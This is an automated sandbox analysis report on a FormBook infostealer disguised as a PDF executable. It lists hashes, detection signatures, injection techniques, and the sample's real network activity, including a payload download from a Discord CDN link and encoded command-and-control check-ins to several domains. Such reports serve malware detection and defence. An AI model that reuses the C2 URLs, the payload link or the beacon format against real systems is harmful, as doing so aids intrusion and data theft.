Windows Analysis Report DOC209272621615.PDF.exe

Overview

General Information

Sample Name: DOC209272621615.PDF.exe
Analysis ID: 532011
MD5: e5d9db9823fb854169e25fceca42e804
SHA1: 9982908b8dcddd6ef44d80e0f6491ad87b80e53d
SHA256: dbe703a0b4d7694e0d05d6a1f5f8c8bbae4a8d6b5acba1238da5b2f523fa9565
Tags: exe

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Multi AV Scanner detection for submitted file

Yara detected FormBook

Malicious sample detected (through community Yara rule)

System process connects to network (likely due to code injection or exploit)

Multi AV Scanner detection for dropped file

Sample uses process hollowing technique

Maps a DLL or memory area into another process

Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments

Initial sample is a PE file and has a suspicious name

Writes to foreign memory regions

Allocates memory in foreign processes

Performs DNS queries to domains with low reputation

Injects a PE file into a foreign processes

Queues an APC in another process (thread injection)

Contains functionality to inject code into remote processes

Tries to detect virtualization through RDTSC time measurements

Modifies the context of a thread in another process (thread injection)

Creates a thread in another existing process (thread injection)

Contains functionality to inject threads in other processes

Sigma detected: Suspicious Rundll32 Without Any CommandLine Params

Uses an obfuscated file name to hide its real file extension (double extension)

Uses 32bit PE files

Yara signature match

Antivirus or Machine Learning detection for unpacked file

One or more processes crash

Contains functionality to query locales information (e.g. system language)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to call native functions

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to dynamically determine API calls

Contains functionality to record screenshots

HTTP GET or POST without a user agent

Contains functionality for execution timing, often used to detect debuggers

Creates a DirectInput object (often for capturing keystrokes)

Extensive use of GetProcAddress (often used to hide API calls)

PE file contains strange resources

Drops PE files

Tries to load missing DLLs

Contains functionality to read the PEB

Checks if the current process is being debugged

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to detect sandboxes (mouse cursor move detection)

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source: DOC209272621615.PDF.exe
Rule: Typical_Malware_String_Transforms
Description: Detects typical strings in a reversed or otherwise modified form
Author: Florian Roth
Strings:
  • 0x96c92:$i2: sserddAcorPteG
  • 0x96fdc:$i2: sserddAcorPteG
  • 0x96d0a:$i3: AyrarbiLdaoL

Dropped Files

Source: C:\Users\user\Contacts\zcmnlkkW.url
Rule: Methodology_Contains_Shortcut_OtherURIhandlers
Description: Detects possible shortcut usage for .URL persistence
Author: @itsreallynick (Nick Carr)
Strings:
  • 0x14:$file: URL=
  • 0x0:$url_explicit: [InternetShortcut]

Source: C:\Users\user\Contacts\Wkklnmcz.exe
Rule: Typical_Malware_String_Transforms
Description: Detects typical strings in a reversed or otherwise modified form
Author: Florian Roth
Strings:
  • 0x96c92:$i2: sserddAcorPteG
  • 0x96fdc:$i2: sserddAcorPteG
  • 0x96d0a:$i3: AyrarbiLdaoL

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Source: Process started Author: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth, Christian Burkard: Data: Command: C:\Windows\SysWOW64\rundll32.exe, CommandLine: C:\Windows\SysWOW64\rundll32.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3352, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe, ProcessId: 3372
Sigma detected: Suspicious Rundll32 Without Any CommandLine Params
Source: Process started Author: Florian Roth: Data: Command: C:\Windows\SysWOW64\rundll32.exe, CommandLine: C:\Windows\SysWOW64\rundll32.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3352, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe, ProcessId: 3372

Jbx Signature Overview

AV Detection:

Multi AV Scanner detection for submitted file
Source: DOC209272621615.PDF.exe ReversingLabs: Detection: 33%
Yara detected FormBook
Multi AV Scanner detection for dropped file
Source: C:\Users\user\Contacts\Wkklnmcz.exe ReversingLabs: Detection: 33%
Antivirus or Machine Learning detection for unpacked file
Source: 12.0.mobsync.exe.72480000.2.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 7.0.logagent.exe.72480000.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 12.0.mobsync.exe.72480000.3.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 0.2.DOC209272621615.PDF.exe.3590000.2.unpack Avira: Label: TR/Hijacker.Gen
Source: 12.0.mobsync.exe.72480000.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 7.0.logagent.exe.72480000.3.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 6.2.Wkklnmcz.exe.3450000.2.unpack Avira: Label: TR/Hijacker.Gen
Source: 10.2.Wkklnmcz.exe.72480000.3.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 0.0.DOC209272621615.PDF.exe.3590000.3.unpack Avira: Label: TR/Hijacker.Gen
Source: 12.0.mobsync.exe.72480000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 7.0.logagent.exe.72480000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 12.2.mobsync.exe.72480000.3.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 6.2.Wkklnmcz.exe.72480000.3.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 0.0.DOC209272621615.PDF.exe.3590000.6.unpack Avira: Label: TR/Hijacker.Gen
Source: 10.2.Wkklnmcz.exe.3590000.2.unpack Avira: Label: TR/Hijacker.Gen
Source: 7.2.logagent.exe.72480000.4.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 7.0.logagent.exe.72480000.2.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Compliance:

Uses 32bit PE files
Source: DOC209272621615.PDF.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
Uses secure TLS version for HTTPS connections
Source: unknown HTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.3:49750 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.3:49754 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.3:49757 version: TLS 1.2
Binary contains paths to debug symbols
Source: Binary string: cryptbase.pdbt source: WerFault.exe, 00000005.00000003.310687968.0000000005351000.00000004.00000001.sdmp
Source: Binary string: WWAHost.pdb source: mobsync.exe, 0000000C.00000002.462120401.0000000005040000.00000040.00020000.sdmp
Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000005.00000003.310687968.0000000005351000.00000004.00000001.sdmp
Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000005.00000003.310687968.0000000005351000.00000004.00000001.sdmp
Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000005.00000003.310687968.0000000005351000.00000004.00000001.sdmp
Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000005.00000003.310687968.0000000005351000.00000004.00000001.sdmp
Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000005.00000003.310687968.0000000005351000.00000004.00000001.sdmp
Source: Binary string: nCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwinmm.pdb source: WerFault.exe, 00000005.00000002.328390174.00000000009E2000.00000004.00000001.sdmp
Source: Binary string: WWAHost.pdbUGP source: mobsync.exe, 0000000C.00000002.462120401.0000000005040000.00000040.00020000.sdmp
Source: Binary string: combase.pdb source: WerFault.exe, 00000005.00000003.310687968.0000000005351000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: logagent.exe, 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp, logagent.exe, 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, mobsync.exe, 0000000C.00000002.461547697.0000000004CBF000.00000040.00000001.sdmp, mobsync.exe, 0000000C.00000002.460534090.0000000004BA0000.00000040.00000001.sdmp, rundll32.exe, 00000012.00000002.816777544.0000000004690000.00000040.00000001.sdmp, rundll32.exe, 00000012.00000002.817065918.00000000047AF000.00000040.00000001.sdmp, WWAHost.exe, 00000016.00000002.461781268.0000000003BBF000.00000040.00000001.sdmp, WWAHost.exe, 00000016.00000002.461510475.0000000003AA0000.00000040.00000001.sdmp
Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000005.00000003.310687968.0000000005351000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdb source: WerFault.exe, 00000005.00000003.310687968.0000000005351000.00000004.00000001.sdmp, logagent.exe, logagent.exe, 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp, logagent.exe, 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, mobsync.exe, 0000000C.00000002.461547697.0000000004CBF000.00000040.00000001.sdmp, mobsync.exe, 0000000C.00000002.460534090.0000000004BA0000.00000040.00000001.sdmp, rundll32.exe, 00000012.00000002.816777544.0000000004690000.00000040.00000001.sdmp, rundll32.exe, 00000012.00000002.817065918.00000000047AF000.00000040.00000001.sdmp, WWAHost.exe, 00000016.00000002.461781268.0000000003BBF000.00000040.00000001.sdmp, WWAHost.exe, 00000016.00000002.461510475.0000000003AA0000.00000040.00000001.sdmp
Source: Binary string: rundll32.pdb source: logagent.exe, 00000007.00000002.434750014.00000000049A0000.00000040.00020000.sdmp
Source: Binary string: rundll32.pdbGCTL source: logagent.exe, 00000007.00000002.434750014.00000000049A0000.00000040.00020000.sdmp
Source: Binary string: winmm.pdb source: WerFault.exe, 00000005.00000003.303898040.0000000004EE0000.00000004.00000001.sdmp
Source: Binary string: a7~winmm.pdb source: WerFault.exe, 00000005.00000003.304269089.0000000004F64000.00000004.00000001.sdmp, WerFault.exe, 00000005.00000003.303618478.0000000004F5E000.00000004.00000001.sdmp, WerFault.exe, 00000005.00000003.304006492.0000000004F64000.00000004.00000001.sdmp, WerFault.exe, 00000005.00000003.304486310.0000000004F64000.00000004.00000001.sdmp
Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000005.00000003.310687968.0000000005351000.00000004.00000001.sdmp
Source: Binary string: logagent.pdb source: rundll32.exe, 00000012.00000002.811265717.00000000004C4000.00000004.00000020.sdmp, rundll32.exe, 00000012.00000002.817526950.0000000004BC7000.00000004.00020000.sdmp
Source: Binary string: winmm.pdb( source: WerFault.exe, 00000005.00000003.303898040.0000000004EE0000.00000004.00000001.sdmp
Source: Binary string: apphelp.pdb source: WerFault.exe, 00000005.00000003.310687968.0000000005351000.00000004.00000001.sdmp
Source: Binary string: logagent.pdbGCTL source: rundll32.exe, 00000012.00000002.811265717.00000000004C4000.00000004.00000020.sdmp, rundll32.exe, 00000012.00000002.817526950.0000000004BC7000.00000004.00020000.sdmp
Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000005.00000003.310687968.0000000005351000.00000004.00000001.sdmp

Spreading:

Contains functionality to enumerate / list files inside a directory
Source: C:\Users\user\Contacts\Wkklnmcz.exe Code function: 6_2_00405CBC GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA, 6_2_00405CBC
Source: C:\Users\user\Contacts\Wkklnmcz.exe Code function: 10_2_00405CBC GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA, 10_2_00405CBC

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49843 -> 156.235.157.134:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49843 -> 156.235.157.134:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49843 -> 156.235.157.134:80
System process connects to network (likely due to code injection or exploit)
Performs DNS queries to domains with low reputation
Source: C:\Windows\explorer.exe DNS query: www.ncgf08.xyz
Source: C:\Windows\explorer.exe DNS query: www.tourbox.xyz
Source: C:\Windows\explorer.exe DNS query: www.neema.xyz
Source: DNS query: www.tourbox.xyz
HTTP GET or POST without a user agent
Source: unknown Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49757
Tries to download or post to a non-existing HTTP route (HTTP/1.1 404 Not Found / 503 Service Unavailable / 403 Forbidden) Show sources
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 01 Dec 2021 15:24:54 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecontent-type: text/html; charset=UTF-8expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0link: <https://sumikkoremon.com/wp-json/>; rel="https://api.w.org/"content-length: 5784date: Wed, 01 Dec 2021 15:25:06 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 3c 6c 69 6e 6b 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 73 75 6d 69 6b 6b 6f 72 65 6d 6f 6e 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 63 61 63 68 65 2f 61 75 74 6f 70 74 69 6d 69 7a 65 2f 63 73 73 2f 61 75 74 6f 70 74 69 6d 69 7a 65 5f 66 39 66 30 65 64 63 64 65 65 37 30 64 63 63 36 38 32 36 66 33 61 38 30 65 32 35 35 33 66 63 34 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 63 61 6e 6f 6e 69 63 61 6c 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 75 6d 69 6b 6b 6f 72 65 6d 6f 6e 2e 63 6f 6d 2f 34 30 34 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 22 3e 20 3c 21 2d 2d 5b 69 66 20 49 45 5d 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 
3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 73 75 6d 69 6b 6b 6f 72 65 6d 6f 6e 2e 63 6f 6d 27 20 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 27 20 2f 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 27 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 27 61 6e 6f 6e 79 6d 6f 75 73 27 20 72 65 6c 3d 27 70 72 65 63 6f 6e 6e 65 63 74 27 20 2f 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 72 65 6c 3d 27 70 72 65 63 6f 6e 6e 65 63 74
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecontent-type: text/htmllast-modified: Tue, 25 Jun 2019 07:07:19 GMTetag: "999-5d11c827-698982c0c6efc961;;;"accept-ranges: bytescontent-length: 2457date: Wed, 01 Dec 2021 15:25:12 GMTserver: LiteSpeed
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 01 Dec 2021 15:25:22 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 01 Dec 2021 15:26:50 GMTContent-Type: text/htmlContent-Length: 146Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: awselb/2.0Date: Wed, 01 Dec 2021 15:26:55 GMTContent-Type: text/htmlContent-Length: 118Connection: close Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecontent-type: text/htmllast-modified: Tue, 25 Jun 2019 07:07:19 GMTetag: "999-5d11c827-698982c0c6efc961;;;"accept-ranges: bytescontent-length: 2457date: Wed, 01 Dec 2021 15:27:07 GMTserver: LiteSpeed
URLs found in memory or binary data
Source: DOC209272621615.PDF.exe, 00000000.00000003.288963925.00000000007AB000.00000004.00000001.sdmp, DOC209272621615.PDF.exe, 00000000.00000000.294309422.00000000007B2000.00000004.00000001.sdmp, DOC209272621615.PDF.exe, 00000000.00000003.288276649.00000000007AB000.00000004.00000001.sdmp, WerFault.exe, 00000005.00000002.329958338.0000000004F64000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: rundll32.exe, 00000012.00000002.817618573.0000000004D42000.00000004.00020000.sdmp String found in binary or memory: http://scheme.org/SiteNavigationElement
Source: rundll32.exe, 00000012.00000002.817618573.0000000004D42000.00000004.00020000.sdmp String found in binary or memory: http://sumikkoremon.com/wp-content/cache/autoptimize/js/autoptimize_11a5c4c4430017076e7a7babc5eec58b
Source: rundll32.exe, 00000012.00000003.791203124.0000000000509000.00000004.00000001.sdmp String found in binary or memory: http://www.era636.com/pvxz/?e0DDHLix=lq5nkvJODZO3vjBQ1IcTTlcoFI8MUDuIstt0HJAs3uVUg2aG8/bxRH4x4Hgr0vc
Source: DOC209272621615.PDF.exe, 00000000.00000003.288963925.00000000007AB000.00000004.00000001.sdmp, DOC209272621615.PDF.exe, 00000000.00000000.294309422.00000000007B2000.00000004.00000001.sdmp, DOC209272621615.PDF.exe, 00000000.00000000.294280203.0000000000769000.00000004.00000020.sdmp, DOC209272621615.PDF.exe, 00000000.00000002.331410087.0000000000769000.00000004.00000020.sdmp String found in binary or memory: https://cdn.discordapp.com/
Source: Wkklnmcz.exe, 0000000A.00000002.351491610.0000000002FFB000.00000004.00000001.sdmp String found in binary or memory: https://cdn.discordapp.com/attachments/900622540588843013/915461671072432149/Wkklnmczcyrsyafzucgflyt
Source: rundll32.exe, 00000012.00000002.817618573.0000000004D42000.00000004.00020000.sdmp String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/Swiper/4.5.0/js/swiper.min.js?ver=5.8.2
Source: rundll32.exe, 00000012.00000002.817618573.0000000004D42000.00000004.00020000.sdmp String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/gsap/2.1.2/TweenMax.min.js?ver=5.8.2
Source: rundll32.exe, 00000012.00000002.817618573.0000000004D42000.00000004.00020000.sdmp String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/lity/2.3.1/lity.min.css
Source: rundll32.exe, 00000012.00000002.817618573.0000000004D42000.00000004.00020000.sdmp String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/lity/2.3.1/lity.min.js?ver=5.8.2
Source: rundll32.exe, 00000012.00000002.817618573.0000000004D42000.00000004.00020000.sdmp String found in binary or memory: https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css
Source: rundll32.exe, 00000012.00000002.817618573.0000000004D42000.00000004.00020000.sdmp String found in binary or memory: https://stats.wp.com/e-202148.js
Source: rundll32.exe, 00000012.00000002.817618573.0000000004D42000.00000004.00020000.sdmp String found in binary or memory: https://sumikkoremon.com/
Source: rundll32.exe, 00000012.00000002.817618573.0000000004D42000.00000004.00020000.sdmp String found in binary or memory: https://widgets.getpocket.com/v1/j/btn.js?v=1
Performs DNS lookups
Source: unknown DNS traffic detected: queries for: cdn.discordapp.com
Downloads files from webservers via HTTP
Source: global traffic HTTP traffic detected: GET /attachments/900622540588843013/915461671072432149/Wkklnmczcyrsyafzucgflytssyuynbb HTTP/1.1User-Agent: lValiHost: cdn.discordapp.com
Source: global traffic HTTP traffic detected: GET /attachments/900622540588843013/915461671072432149/Wkklnmczcyrsyafzucgflytssyuynbb HTTP/1.1User-Agent: asweHost: cdn.discordapp.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /attachments/900622540588843013/915461671072432149/Wkklnmczcyrsyafzucgflytssyuynbb HTTP/1.1User-Agent: asweHost: cdn.discordapp.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /attachments/900622540588843013/915461671072432149/Wkklnmczcyrsyafzucgflytssyuynbb HTTP/1.1User-Agent: asweHost: cdn.discordapp.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /pvxz/?_FN4W=CV_PbjYpbVj&e0DDHLix=kv1trFZowiadIe+O9wf8jU76F0yWsAfdW5MSCImgWwgiD9GBizL2DmUTWvRLYZu8pEo+ HTTP/1.1Host: www.ncgf08.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /pvxz/?e0DDHLix=TAqp8mx20QUzgyvQGraUKSgK7ecLW6Kyu1royTDzc6juJCT2xEuV+4TJn9imIiw/7sSq&_FN4W=CV_PbjYpbVj HTTP/1.1Host: www.sa-pontianak.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /pvxz/?_FN4W=CV_PbjYpbVj&e0DDHLix=gP6rjQtpXSIvmASTmEYziIOwC4Gfkrp9Oew9+ghHkWFgU4GrN+F2/eFp8+5BM1VAZDt9 HTTP/1.1Host: www.hbjngs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /pvxz/?e0DDHLix=T99sF+FFCMRVIrN5sJoW9bSX1euAJ0OSqUAUXGTCOoP2/2ZrE3P4zH5359id1TPJ7WYx&_FN4W=CV_PbjYpbVj HTTP/1.1Host: www.sumikkoremon.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /pvxz/?_FN4W=CV_PbjYpbVj&e0DDHLix=9jDi6R9VCoWG4rsAVGD1PHclw17CfU64luC7Gj+dkvBZl+crlrbAkIZhlDMaD53GUfpv HTTP/1.1Host: www.tourbox.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /pvxz/?_FN4W=CV_PbjYpbVj&e0DDHLix=5IYdhC0GHghhu3qU8D/jZG+rEeM2mibLCs+oL86uP0UJoc5Rrxh3LqrepKBtkhDSDZoq HTTP/1.1Host: www.jardingenesis.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /pvxz/?_FN4W=CV_PbjYpbVj&e0DDHLix=VkzKqNHEMf7DVNqsETKs6wpXpLehvGO8WXwP2kNWjaoREXW57VMlBwZntpJdd+mq+oTm HTTP/1.1Host: www.enterprisedaas.computerConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /pvxz/?e0DDHLix=3PJirK5cgl2FciVCq4PQLPbrqQd5ReNTXZ5Wt3Cj+i9zWbfEV8YElnpOrs676e/lB9CQ&_FN4W=CV_PbjYpbVj HTTP/1.1Host: www.hwkm.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /pvxz/?_FN4W=CV_PbjYpbVj&e0DDHLix=GCiqwE+AocZAO2KzorVbe+5cAVR/sER9WTQIWH8MGwbYJAiKk6D+HvwNUH0eDnTOzOM/ HTTP/1.1Host: www.piiqrio.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /pvxz/?_FN4W=CV_PbjYpbVj&e0DDHLix=vQJfxOtI611W+RxH9ddEKx+uNoigK/zmKccwwKjwQCCnv7782yRErdaxoTFecp96gNUO HTTP/1.1Host: www.neema.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /pvxz/?e0DDHLix=bCINk7waO+AAweJQetcshs4EXJImwvjnAC5D+DXKCvfhq7NWzMtc9ZOrSobl6zpZIFRB&_FN4W=CV_PbjYpbVj HTTP/1.1Host: www.cis136-tgarza.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /pvxz/?_FN4W=CV_PbjYpbVj&e0DDHLix=lWYs4BNKo2NyazceVzv2HGKqsI/0suNqMdeNhVGKV3g2YeuVsAaP6gNudbn3yhvqV62w HTTP/1.1Host: www.meishangtianhua.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /pvxz/?e0DDHLix=Czkl40VpJiNRQJS5lWJnKFxHKlnZ6CRMuI4G/gd+YABSgkcyWt+GOUfbjiYokSpGPyAa&_FN4W=CV_PbjYpbVj HTTP/1.1Host: www.finetipster.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
